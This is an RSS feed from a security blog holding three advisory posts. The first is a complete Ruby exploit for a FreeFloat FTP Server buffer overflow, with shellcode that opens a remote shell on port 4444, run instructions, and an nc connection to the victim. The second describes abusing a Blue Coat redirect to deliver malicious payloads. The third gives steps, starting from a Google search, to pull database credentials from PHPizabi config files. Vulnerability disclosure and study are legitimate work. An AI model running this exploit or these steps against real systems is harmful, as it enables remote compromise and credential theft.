<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Digital Offensive &#187; Security Advisories</title>
	<atom:link href="http://www.digitaloffensive.com/category/advisories/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.digitaloffensive.com</link>
	<description>Take an offensive approach to Security know what your foes know!</description>
	<lastBuildDate>Fri, 27 Jan 2012 18:53:39 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Ruby exploit for FreeFloat FTP Server ACCL Buffer OverFlow and remote Shell</title>
		<link>http://www.digitaloffensive.com/2011/07/ruby-exploit-for-freefloat-ftp-server-accl-buffer-overflow-and-remote-shell/</link>
		<comments>http://www.digitaloffensive.com/2011/07/ruby-exploit-for-freefloat-ftp-server-accl-buffer-overflow-and-remote-shell/#comments</comments>
		<pubDate>Wed, 20 Jul 2011 18:53:14 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Security Advisories]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=352</guid>
		<description><![CDATA[Ruby exploit for FreeFloat FTP Server ACCL Buffer OverFlow and remote Shell The original vulnerability was published here: http://www.exploit-db.com/exploits/17550. The FreeFloat FTP server is a free standing executable FTP server requiring no installation on a computer system. The application itself is riddled with buffer overflows and is extremely simple to crash. Though the trick is [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Ruby exploit for FreeFloat FTP Server ACCL Buffer OverFlow and remote Shell</strong></p>
<p>The original vulnerability was published here: <a href="http://www.exploit-db.com/exploits/17550">http://www.exploit-db.com/exploits/17550</a>. The FreeFloat FTP server is a free-standing executable FTP server requiring no installation on a computer system. The application itself is riddled with buffer overflows and is extremely simple to crash. The trick, though, is not to crash it but to gain shell access; Mortis originally published the working exploit in Python. What we have done here is convert it into a Ruby exploit. Why? Simply because, while learning Ruby, I took it as a challenge to test what I had learned.</p>
<p><strong>Exploiting the vulnerability</strong></p>
<p>To test the actual exploit, download the vulnerable software and install it on a Windows XP SP3 machine: <a href="http://www.freefloat.com/software/freefloatftpserver.zip">http://www.freefloat.com/software/freefloatftpserver.zip</a>. Next, on a Linux machine, copy the Ruby code provided, save it to a file called <code>ftpexploit.rb</code> and chmod it to 777. To run the exploit, type <code>./ftpexploit.rb</code> and enter the victim's IP. If the exploit is successful you will get a Windows shell.</p>
<p><strong>The Exploit</strong></p>
<pre><code>#!/usr/bin/ruby
#
# FreeFloat FTP Server ACCL buffer overflow and remote shell exploit
# Original exploit by: Mortis, as found on exploit-db.com
# Code redesigned into Ruby by genxweb from digitaloffensive.com
###############################################################
###############################################################
require 'socket'

puts "Enter the IP to Exploit: "
h0st = gets
victim = h0st.chomp   # strip the trailing newline from the typed address

# shellcode: opens a listener shell on port 4444
sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"

padding = "A"*246
sled = "\x90"*20
jmpesp = "\x13\x44\x87\x7c"
sploit = "#{padding}#{jmpesp}#{sled}#{sc}"

# Ruby's socket class is TCPSocket (the original post had TCPsocket, which raises NameError)
s = TCPSocket.new(victim, 21)
s.recv(1024)
s.puts("USER test\r\n")
s.recv(1024)
s.puts("PASS test\r\n")
s.recv(1024)
s.puts("ACCL "+sploit+"\r\n")
s.close()

puts "#### IF EXPLOIT IS SUCCESSFUL SHELL WILL OPEN ####"
puts "###################################################"
system("nc #{victim} 4444")
</code></pre>
<p><strong>How the code works</strong></p>
<p>First we ask the hacker for the victim's IP address. Once we have that we remove the trailing newline using the chomp command. Now that we have the victim's IP we build the packet that will be sent over the socket we open.</p>
<p>The first part of the packet is the padding and sled. This gets us to the point where we can overwrite memory with our shellcode. The jmpesp variable is the place in memory, in big endian format, to enter our shellcode. The shellcode is a generic shellcode that opens port 4444 on the victim's machine with Windows command line access.</p>
<p>Once the packet is built we open a connection to the victim on port 21, the standard FTP port. Once the connection is established we send the user "test" and password "test". After that we send the ACCL command with the exploit packet. If this is successful a shell will spawn on the victim's box.</p>
<p>Finally, the exploit uses netcat (nc) to connect to the victim's machine so you can interact with the shell.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2011/07/ruby-exploit-for-freefloat-ftp-server-accl-buffer-overflow-and-remote-shell/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Blue Coat URL Redirection Vulnerability</title>
		<link>http://www.digitaloffensive.com/2010/04/blue-coat-url-redirection-vulnerability/</link>
		<comments>http://www.digitaloffensive.com/2010/04/blue-coat-url-redirection-vulnerability/#comments</comments>
		<pubDate>Fri, 02 Apr 2010 18:09:34 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Security Advisories]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=193</guid>
		<description><![CDATA[Blue Coat URL Redirection Vulnerability The Blue Coat web filter is one of the industry’s leading web filtering solutions. It provides the organization the ability to filter where their employees, vendors, customers or guests can go online. The Blue Coat Web filter has an issue where it will display a base64 encoded URL in the [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><strong>Blue Coat URL Redirection Vulnerability</strong></p>
<p style="text-align: left;">The Blue Coat web filter is one of the industry’s leading web filtering solutions. It gives an organization the ability to filter where its employees, vendors, customers or guests can go online.</p>
<p style="text-align: left;">The Blue Coat web filter has an issue where, when it hits an error, it displays a base64-encoded URL in the following format: <code>http://blue_coat_name/?cfru=aHR0cDovL3d3dy5nb29nbGUuY29tLw==</code>.</p>
<p style="text-align: left;"><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/04/bluecoat.jpg" target="_blank"><img class="aligncenter size-medium wp-image-194" title="bluecoat" src="http://www.digitaloffensive.com/wp-content/uploads/2010/04/bluecoat-300x121.jpg" alt="" width="300" height="121" /></a></p>
<p style="text-align: left;">This URL is displayed in the end user's browser, usually with a message relating to the issue. The encoded URL is the URL that the end user was trying to reach before the error occurred. In the URL above I was trying to access www.google.com. To verify that, we can use any base64 decoder; for this example I used an online version found at <a href="http://base64-encoder-online.waraxe.us/" target="_blank">http://base64-encoder-online.waraxe.us/</a>.</p>
<p style="text-align: left;"><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/04/encoded.jpg"><img class="aligncenter size-medium wp-image-195" title="encoded" src="http://www.digitaloffensive.com/wp-content/uploads/2010/04/encoded-300x224.jpg" alt="" width="300" height="224" /></a><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/04/decoded.jpg"><img class="aligncenter size-medium wp-image-196" title="decoded" src="http://www.digitaloffensive.com/wp-content/uploads/2010/04/decoded-300x224.jpg" alt="" width="300" height="224" /></a></p>
<p style="text-align: left;">All a malicious user would need to carry out an attack is a remote site hosting a malicious payload, or an attack platform like Metasploit or Core Impact to host the malicious file. The attacker would then use a base64 encoder to encode the malicious URL and send the resulting link to the system administrator or any other end user. This attack could lead to a full system compromise, depending on the payload and the rights of the user clicking the URL.</p>
<p>The limitation of this vulnerability is that the DNS name and/or IP of the Blue Coat web appliance will differ for the majority of companies. Though I bet there are at least a few companies out there that have named their Blue Coat web filter “proxy” or “webproxy”. By posting several of these generic names on the internet, it may also be possible to compromise other remote machines.</p>
<p>The question I have for Blue Coat is why you would provide such functionality. Why not just display the URL in clear text?</p>
]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/04/blue-coat-url-redirection-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PHPizabi: Possible vulnerability in information disclosure and database integrity</title>
		<link>http://www.digitaloffensive.com/2009/09/phpizabi-possible-vulnerability-in-information-disclosure-and-database-integrity/</link>
		<comments>http://www.digitaloffensive.com/2009/09/phpizabi-possible-vulnerability-in-information-disclosure-and-database-integrity/#comments</comments>
		<pubDate>Wed, 23 Sep 2009 13:39:56 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Security Advisories]]></category>

		<guid isPermaLink="false">http://digitaloffensive.com/?p=7</guid>
		<description><![CDATA[PHPizabi: Possible vulnerability in information disclosure and database integrity Vendor: Notified. I notified the vendor of this issue over three months ago and have not heard back from them regarding this threat. According to their website there have been no patches or core releases since the ones I have listed below. Version: PHPizabi 0.848b [...]]]></description>
			<content:encoded><![CDATA[<p><strong>PHPizabi: Possible vulnerability in information disclosure and database integrity</strong></p>
<p><strong>Vendor:</strong> Notified. I notified the vendor of this issue over three months ago and have not heard back from them regarding this threat. According to their website there have been no patches or core releases since the ones I have listed below.</p>
<p><strong>Version:</strong> PHPizabi 0.848b C1 HFP1 (Alicia)</p>
<p><strong>Hot fixes: </strong> 848 Core HotFix Pack 3 0848bC1_HFP3.zip and below</p>
<p><strong>Product Info:</strong></p>
<p>“More than a simple script, dating script, or even just a matchmaker; PHPizabi is a feature rich social networking platform that integrates everything you need to jumpstart your community, dating site, or social networking portal right out of the box. PHPizabi is one of the most reliable, safe, and solid platforms on the market, offering your users features they could only dream of.”</p>
<p><strong>Vulnerability:</strong></p>
<p>In the default configuration and installation of this script the “system” dir is left open, allowing directory indexing. When I discovered that the system dir was open I was able to download the configuration file, which contained sensitive information about the site such as the database connection details, including the username and password.</p>
<p><strong>To exploit</strong></p>
<ol>
<li>Google: “Powered by PHPizabi”</li>
<li>http://sitename.com/system/</li>
<li>Download the file and open it in an editor.</li>
</ol>
<p><strong>Temp solutions:</strong></p>
<ol>
<li>Add a .htaccess to the system dir that says
<ol type="a">
<li><code>Options -Indexes</code></li>
<li>Note that this will not stop an attacker from retrieving the file directly, for example with wget against http://sitename.com/system/config.inc.php.</li>
</ol>
</li>
<li>Make sure that the database can only be accessed locally.
<ol type="a">
<li>The host I had permission to test this on had the database open to remote connections.</li>
</ol>
</li>
</ol>
<p>The vendor should have the file die if it is accessed directly, as they do if you try to access a file in the admin directory directly.</p>
<p>Tested on: This has been tested against my site www.xxxxxxxx.com. I have made some edits to the code to protect my site and contacted the host about the database settings. The site address has been “X”ed out to protect it from people trying the attack against it.</p>
<p>Vulnerability Classification: Possible vulnerability in information disclosure and database integrity.</p>
<p>Thanks</p>
<p>Michael LaSalvia</p>
<p>www.digitaloffensive.com</p>
]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2009/09/phpizabi-possible-vulnerability-in-information-disclosure-and-database-integrity/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

